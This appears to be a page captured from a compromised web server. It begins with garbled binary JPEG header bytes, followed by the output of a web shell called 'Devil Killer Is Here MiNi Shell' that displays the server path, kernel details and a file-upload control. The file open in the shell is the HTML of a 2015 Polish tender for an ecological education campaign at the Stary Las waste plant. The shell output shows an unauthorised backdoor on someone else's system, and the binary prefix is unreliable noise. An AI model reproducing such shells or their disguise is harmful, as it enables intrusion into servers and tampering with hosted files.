JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150323/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150323/63970-N-2015.html

<p class="kh_header"><b>Starogard Gdański: Edukacja ekologiczna mieszkańców regionu południowego projektu pn.: Racjonalizacja gospodarki odpadami poprzez budowę Zakładu Utylizacji Odpadów Komunalnych Stary Las</b><br>
<b>Numer ogłoszenia: 63970 - 2015; data zamieszczenia: 23.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Utylizacji Odpadów Komunalnych "Stary Las" Sp. z o. o. , Stary Las 9, 83-200 Starogard Gdański, woj. pomorskie, tel. 58 5300799, faks 58 5300799.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Edukacja ekologiczna mieszkańców regionu południowego projektu pn.: Racjonalizacja gospodarki odpadami poprzez budowę Zakładu Utylizacji Odpadów Komunalnych Stary Las.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia są Usługi  świadczenie działań promocyjno informacyjnych (dalej Public Relation PR), związane z promocją udziału Unii Europejskiej. Prowadzenie działań promocyjnych i informacyjnych będzie wykonywane zgodnie z wymaganiami Zamawiającego oraz aktualnymi Zasadami i Wytycznymi dotyczącymi działań informacyjno promocyjnych odnoszących się do przedsięwzięć współfinansowanych z Funduszu Spójności.
Przedmiot zamówienia jest powiązany z postępowaniem przetargowym dotyczącym zaprojektowania i wykonania robót budowlanych polegających na budowie instalacji biologicznego przetwarzania odpadów komunalnych, z możliwością biologicznego suszenia wraz z budową i przebudową infrastruktury towarzyszącej dla Zakładu Utylizacji Odpadów Komunalnych Stary Las Sp. z o.o., w miejscowości Stary Las, gm. Starogard Gdański. Jest to rozszerzenie zakresu rzeczowego projektu wynikające z Rozporządzenia Ministra  Środowiska z dnia 11 września 2012 w sprawie mechaniczno biologicznego przetwarzania zmieszanych odpadów komunalnych (Dz.U. 2012 poz. 1052).



 
Cel i zakres zamówienia
Głównym celem zamówienia jest edukacja ekologiczna jak największej liczby mieszkańców Regionu Południowego podlegającego pod RIPOK Stary Las oraz pogłębienie ich wiedzy na temat ekologii i prawidłowej segregacji w istniejącym systemie zbiórki odpadów. Edukacja ekologiczna odbędzie się w dwóch zakresach
Zakres obejmuje
opracowanie koncepcji efektywnej kampanii edukacyjnej na terenie regionu południowego obejmującego RIPOK Stary Las w oparciu o prowadzone na terenie szkół lub Zakładu lekcje pokazowe z wykorzystaniem materiałów promocyjnych opisanych poniżej wraz z opracowaniem mierników jakości edukacji i ankiet, na podstawie których prowadzono by pomiar jakości kampanii. Ponadto koncepcja ma uwzględniać zaprojektowanie i wykonanie przez Wykonawcę kampanii medialnej wspierającej działania kampanii edukacyjnej zaprojektowanej przez Wykonawcę i realizowanej przez pracowników Zamawiającego. Kampania medialna ma zakładać publikację zaproszeń na festyny gminne wplecione w cykl 20 artykułów sponsorowanych zainicjowanych na temat selektywnej zbiórki odpadów i gospodarki odpadami na terenie regionu południowego województwa pomorskiego w 2 różnych tytułach prasy regionalnej (obejmującej wszystkie z gmin na terenie których będzie realizowana kampania edukacyjna) bądź w większej liczbie tytułów prasy lokalnej (których łączny zakres terytorialny pokrywa się z powyższym) o wielkości zajmującej standardowy rozmiar A5 (wielkość czcionki, ilość znaków, szata graficzna  do uzgodnienia z Zamawiającym), zgodnie z informacją przedstawioną w pkt b Zakresu . Terminy prowadzenia kampanii medialnej mają być powiązane z wyjazdami pracowników Zamawiającego do szkół przyjazdami szkół na teren Zakładu oraz z organizowanymi festynami w Gminach i uwzględniona w koncepcji kampanii edukacyjnej ok 60 wyjazdów do szkół  przyjazdów ze szkół. Wykonawca ma wskazać wyłącznie terminy, zaakceptowane uprzednio przez Zamawiającego, gdzie Zamawiający nie podaje ilości spotkań jakie mają odbyć się w szkołach bądź na terenie Zakładu.
Zarys kampanii edukacyjnej wygląda następująco Kampania odbędzie się na zasadzie wyjazdów do wybranych przez gminę Szkół lub ich przyjazdu na teren Zakładu. 
W przypadku przyjazdu do Zakładu, gmina musi zapewnić dojazd na teren Zakładu. Listę szkół i planowane terminy wyjazdów poda Zamawiający. Kampania wsparta będzie przez kampanię medialną czyli wydanie ulotek, broszur, itp. skierowaną do wszystkich mieszkańców regionu, poprzez umieszczenie artykułów w prasie oraz przekazanie ulotek do gmin w celu rozprowadzenia wśród mieszkańców.  
Zadaniem Wykonawcy w tematyce ankiet jest przygotowanie wzorów ankiet  dla potrzeb prowadzenia zajęć edukacyjnych w szkołach odpowiednich dla grup wiekowych i programu zajęć oraz wzoru ankiety określającej wiedzę uczestników festynu z zakresu prawidłowej segregacji odpadów, bez ich wydruku i przeprowadzenia. Część merytoryczną ankiet przygotowuje Wykonawca korzystając z wiedzy pracowników Zamawiającego. Pytania, sposób ich zadawania, odpowiedzi mają być przygotowane adekwatnie do wieku ankietowanych (odpowiednio: dla ankiet w szkołach  według grup wiekowych; dla ankiet na festynach  dla osób dorosłych). Wykonawca ustala ilość pytań; przy czym należy pamiętać, że czas wypełniania ankiety nie powinien być większy niż 3-5 minut. Pytania powinny być związane z prawidłową segregacją odpadów i systemem gospodarki odpadami, mają badać poziom wiedzy po przeprowadzonej edukacji i mają być adekwatne do wieku ankietowanych. Np. Do którego pojemnika należy wrzucić (rodzaj odpadu) Jak często opłaca się opłatę za odbiór odpadów, Kto ustala zasady selektywnej zbiórki na terenie gminy ?. Wykonawca nie przeprowadza ankiet; przekazuje jedynie Zamawiającemu wzory ankiet. Ankiety związane z edukacją w szkołach drukować i przeprowadzać będzie Zamawiający.
Wykonawca ma zaproponować miernik edukacji  narzędzie umożliwiające analizę jakości prowadzonych działań edukacyjnych  wraz z metodologią stosowania. 
W szkołach i na terenie Zakładu lekcje będą przeprowadzane przez pracowników Zamawiającego. Wykonawca odpowiada tylko za sporządzenie scenariuszy. Długość scenariusza należy dostosować do długości zajęć  nie dłużej niż 45 min. Scenariusze należy przygotować dla poszczególnych grup wiekowych
 scenariusz dla przedszkola
 scenariusz dla klas I III
 scenariusz dla klas IV VI
 scenariusz dla klas I III gimnazjum
 scenariusz dla klas I IV liceum lub technikum
 scenariusz dla dorosłych 
Zamawiający dostarczy materiały niezbędne do stworzenia scenariuszy. 
Zamawiający nie wymaga zdjęć od wykonawcy. Zamawiający wskaże szkoły, w których odbywać się będzie edukacja. Zaproponowane przez Wykonawcę terminy prowadzenia zajęć w szkołach i na terenie Zakładu mogą ulec zmianie. Zamawiający nie będzie uznawał tego za błąd Wykonawcy.

W ramach kampanii medialnej Wykonawca zaktualizuje stronę internetową projektu (funkcjonalna i szybka strona główna  do 10 podstron, w tym galeria zdjęć z realizacji projektu oraz formularz kontaktowy) i będzie ją prowadził w trakcie trwania niniejszego zamówienia, w szczególności prowadząc galerię zdjęć projektu oraz umożliwiając pracownikom Spółki umieszczanie artykułów i innych informacji. Za treść umieszczaną na stronie odpowiada Zamawiający. Strona projektu musi zawierać informacje na temat finansowania, Unii Europejskiej, gospodarki odpadami w województwie pomorskim i na terenie południowego regionu gospodarki odpadami i inne informacje sporządzone przez Zamawiającego. Nowy layout strony musi zostać przedstawiony do akceptacji Zamawiającego. Zakup usługi serwerowej oraz domeny leży po stronie Zamawiającego. Wykonawca może dowolnie wybrać technologię, w której ma zostać  wykonana strona internetowa. Zamawiający dopuszcza serwis zbudowany w oparciu o CMS. Layout ma być oparty na obecnie funkcjonującej stronie www Zamawiającego. Wykonawca ma przeprowadzić szkolenie z obsługi strony internetowej dla 2 osób. Online lub w siedzibie zamawiającego. Wykonawca ma świadczyć wsparcie techniczne do dnia 31.10.2015. Zamawiający wymaga 2 letniego okresu gwarancyjnego. Termin realizacji nie dłużej niż 90 dni na przedstawienie projektu Zamawiającemu, 14 dni na zatwierdzenie i wniesienie uwag, 14 dni na poprawki.
W wyniku opracowania powyższego Zamawiający otrzyma od Wykonawcy nieograniczone w czasie i przestrzeni prawa autorskie do wszystkich projektów przygotowanych w celu realizacji przedmiotu zamówienia.
opracowanie materiałów promocyjnych (na gadżetach reklamowych muszą znaleźć się loga unijne oraz logo Zakładu) tj.
torby ekologiczne o wymiarach 38x 41 cm, materiał drelich, krótkie ucho, gramatura 180g m2 ilość 5.000, torba w kolorze czarnym z zielonym nadrukiem (kolor podobny do koloru logotypu Zamawiającego), druk jednostronny,
broszurę w formacie A5, papier ekologiczny min. 150 g m2., druk w pełnym kolorze, objętość min. 8 stron, ilość 13.000,
Broszura powinna zwierać informacje na temat udziału Unii Europejskiej w finansowaniu Projektu zgodnie z zasadami wizualizacji przedsięwzięć współfinansowanych z Funduszu Spójności, a także powinna być opracowana zgodnie z identyfikacją wizualną działań informacyjno promocyjnych. Ulotka z ogólnymi informacjami o projekcie, działaniach Unii Europejskiej w zakresie Ekologii i ochrony Środowiska oraz finansowaniu projektów z Funduszu Spójności.
ogłoszenie prasowe
zaproszenia na festyn 20 szt. Wykonawca zapewni, aby dane zaproszenie ukazało się co najmniej na terenie gminy, w której odbywać się będzie dany festyn, wraz z 
cykl 3 artykułów podsumowujących festyny oraz 4 artykułów o gospodarce odpadami  wykonawca zapewni by wszystkie artykuły ukazały się w prasie zapewniający dostęp do wszystkich mieszkańców regionu.
Zamawiający określił ilość miejsca zajmowanego przez artykuły sponsorowane. Długość uzależniona jest od wykonawcy. Częstotliwość 1 na tydzień lub raz na 2 tygodnie, nakład nie mniej niż 1000. 
Zamawiający do artykułów może dostarczyć własne zdjęcia, które posiada, za wyjątkiem festynów, wówczas wykonawca festynów dostarczy zdjęcia.
gadżety reklamowe  komplet śrubokrętów  w kształcie długopisu z klipem, zawierający minimum 6 wymiennych końcówek, końcówki mocowane za pomocą magnesu, logo wygrawerowane na powierzchni, materiał metal, wymiary dowolne, kolor czarny lub biały (żeby dobrze było widać grawer), ilość 700 szt. 
 długopisy ekologiczne  długopis ekologiczny wykonany z kartonu, plastiku po recyklingu oraz drewna, lub z samego drewna, logo zrobione za pomocą nadruku lub graweru, materiał: papier, tworzywo lub drewno. ilość 1000 szt. 
 piłka antystresowa  piłeczka wypełniona drobnymi granulkami, logotyp umieszczony na piłeczce, średnica  5 cm, kolor zielony z logiem Zamawiającego w kolorze czarnym, ilość 2000 szt.
 zestaw do manicure  ze stali nierdzewnej: nożyczki, cążki, pilnik i narzędzie do czyszczenia paznokci w aluminiowym etui, na którym ma znaleźć się grawer, ilość 1000 szt.
 czapka z daszkiem  225 g m2, 100% bawełna, 6 panelowa, miękki materiał, wywietrzniki, daszek (8 krotnie stębnowany, dopuszczalne 6  krotnie stębnowany), pasek z tego samego materiału z zapięciem na klamerkę, czapka w kolorze białym lub czarnym z zielonym logotypem Zamawiającego umieszczonym na przodzie czapki w środkowej jego części, ilość 1000 szt., 
 piórnik dla dzieci  drewniany piórnik, wyposażony w dwanaście drewnianych kredek, linijkę, gumkę oraz temperówkę, nadruk na piórniku w kolorze czarnym, materiał drewno. ilość- 1000 szt. 
papierowy stojak w kształcie śmietnika format po złożeniu ok 105x180mm, po rozłożeniu 105x 395mm, karton 300g, druk 4 1 CMYK/P, folia matowa 1 0, koło obrotowe z wykrojonymi ząbkami, średnica koła 105mm, druk 4 4 CMYK, folia matowa 1 1, szerokość podstawy stojaczka po rozłożeniu 35mm, sztancowanie obrysu, znitowanie kółka z pojemnikiem nitem o średnicy 13mm, grubość 1mm, projekt sporządzony przez Wykonawcę, Zastosowanie w stojaku Nit  technika wiązania ze sobą dwóch elementów, zastosowanie tak jak np. tabela naświetlań. Technika pojemnika oparta na wykonaniu tabeli naświetlań. Po boku element ruchomy w celu przewijania prawidłowej segregacji odpadów. Załącznik  obrazuje wizualizację pojemnika z nitem. Zadaniem wykonawcy jest szczegółowe zaprojektowanie, wykonanie prototypu pojemnika i wykonanie całości zamówienia po uzyskaniu akceptacji projektu i prototypu przez Zamawiającego. Ewentualna wadliwość pojemnika będzie analizowana poprzez porównanie wykonania z zaakceptowanym projektem i prototypem.  Ilość 5000szt.
Wykonawca kampanii edukacji ekologicznej wykona scenariusz i nakręci według niego film dłuższy lub równy 10 minutom z rozbudowy Zakładu, na temat nowo powstającej instalacji oraz aktualnego funkcjonowania Zakładu. Koncepcja i scenariusz jest po stronie Wykonawcy. Film będzie rozpowszechniany na stronie internetowej, spotkaniach i festynach. Wykonawca nie musi dysponować reżyserem, operatorem filmowym, dźwiękowcem. Wykonawca musi dysponować profesjonalnym sprzętem filmowym, oprogramowaniem do post  produkcji. Film  HD, profesjonalny lektor (silny głos, nie posiadający załamań głosowych, niezbędna umiejętność improwizacji, bezbłędna dykcja, panowanie nad czasem), odgłosy i efekty niezbędne dla obrazu, muzyka oddająca charakter filmu. Film po montażu i akceptacji dostarczy do Zamawiającego na 100 płytach DVD. Do płyty DVD nie będzie potrzebne menu oraz projekt graficzny okładki. Film ma być realizowany podczas trwania całej inwestycji jednak nie później niż do dnia 15.05.2015. Zamawiający nie dostarcza muzyki oddającej charakter filmu. Film będzie dystrybuowany na: strona www, imprezy plenerowe, YouTube. 

Zamawiający wyznaczy osobę uprawnioną do uznania ewentualnych wad w materiałach reklamowych tj. zamazane logo, niezgodność z wytycznymi z zakresu promocji projektów dofinansowanych z UE, niewyraźne napisy na gadżetach reklamowych, uszkodzenia materiałów, brak możliwości użytkowania gadżetu zgodnie z jego przeznaczeniem..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewiduje się zamówienia uzupełniające w wysokości 20% zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.34.22.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony o ile wykonawca wykaże wykonanie, w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
- przeprowadzenie trzech kampanii promocyjnych o wartości minimum 50.000 zł brutto każda,  gdzie realizacja przynajmniej 1 usługi przeprowadzenia kampanii promocyjnej obejmowała wykonanie filmu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony o ile wykonawca wykaże, że dysponuje lub będzie  dysponował:
- Grafikiem komputerowym - osobą odpowiedzialną za tworzenie i przygotowywanie  materiałów i publikacji reklamowych, legitymującą się znajomością:
a) programów komputerowych jak np: Adobe Photoshop, Adobe Ilustrator, QuarkXpress, Corel Draw, InDesign (lub równoważnych do wymienionych)
b) podstawowych narzedzi webmasterskich, Znajomość HTML, CSS, Javascript 
- Kierownikiem Projektu - osobą legitymującą się: 
a) znajomością oprogramowania Microsoft Office lub równoważnego i MS Project lub równoważnego,
b) znajomością zasad i procedur stosowanych przy zarządzaniu projektami,
c) co najmniej 3-letnim doświadczeniem zawodowym na stanowiskach kierowniczych w mediach lub w zarządzaniu projektami promocyjnymi; Zamawiający dopuszcza możliwość wskazania jednej osoby spełniającej łącznie wymogi określone dla kierownika projektu i grafika komputerowego.
Przez oprogramowanie równoważne należy rozumieć oprogramowanie posiadające właściwości podobne do wymienionego, w szczególności umożliwiające wykonanie przedmiotu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - Termin płatności - 1</li>
</ul>
